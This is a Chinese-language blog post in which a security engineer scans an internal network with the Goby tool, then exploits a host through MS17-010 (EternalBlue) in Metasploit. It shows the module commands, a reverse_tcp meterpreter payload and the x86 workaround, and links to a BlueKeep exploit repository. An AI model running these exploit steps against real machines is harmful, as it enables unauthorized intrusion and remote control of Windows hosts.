0x00 前言
最近疫情嚴重,上班時間一拖再拖,在家學習的時候發現了goby,用於用於監控網絡 IT 資產,
昨日復工,正好可以試用一下,掃描一下內網資產
補充個0708的 https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows
0x01 Goby簡介
分析目標網絡IT資產的規則來建立知識庫,可以在發生安全事件時在最短時間內管理安全緊急情況。與傳統的端口掃描和漏洞掃描不同,Goby僅在較小的受影響區域處理漏洞緊急情況,因此此方法最快,對目標網絡的影響最小
官網下載https://gobies.org/ 安裝試用
設置掃描任務
期間發現了一臺主機可能有永恆之藍,遂打之
0x02 msf--ms17-010
掃描確認
攻擊機 kali linux
靶機 10.118.72.111
工具 metasploit
nmap掃描靶機端口,確定445端口開啟
<code>msfconsole #進入msfmsf >search ms17-010 #查看相關模塊msf > use auxiliary/scanner/smb/smb_ms17_010msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.118.72.111msf auxiliary(scanner/smb/smb_ms17_010) > exploit /<code>
確認 vulnerable!
說明主機10.118.72.111存在MS17-010漏洞
漏洞攻擊
下面使用攻擊模塊
<code>msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.118.72.111rhost => 10.118.72.111msf exploit(windows/smb/ms17_010_eternalblue) > set lhost xxxlhost => xxxmsf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf exploit(windows/smb/ms17_010_eternalblue) >/<code>
但是。。。沒打成功
後面找到了參考https://laucyun.com/a6cb3c752b0fc10f0a9eeef01f7a5f76.html
x86平臺下失敗的解決方法
msf自帶的利用模塊只針對x64版本的操作系統,而對於x86版本的系統卻失效,可以使用https://git.laucyun.com/security/Eternalblue-Doublepulsar-Metasploit.git來解決
最後的配置是
oh 當時還修改了一個 set PROCESSINJECT lsass.exe
就成功拿下
3389端口開啟
遠程登錄成功!
其他資料
ms17010這個問題其實比較難,看到好資料先收藏起來,以便以後攻防使用
https://mp.weixin.qq.com/s/EoHB02qOscZsj3cNS40Rsw
由於內網滲透經驗不足,因此還在摸索,大家可以提一下下一步滲透建議哈!
閱讀更多 甲方信息安全工程師 的文章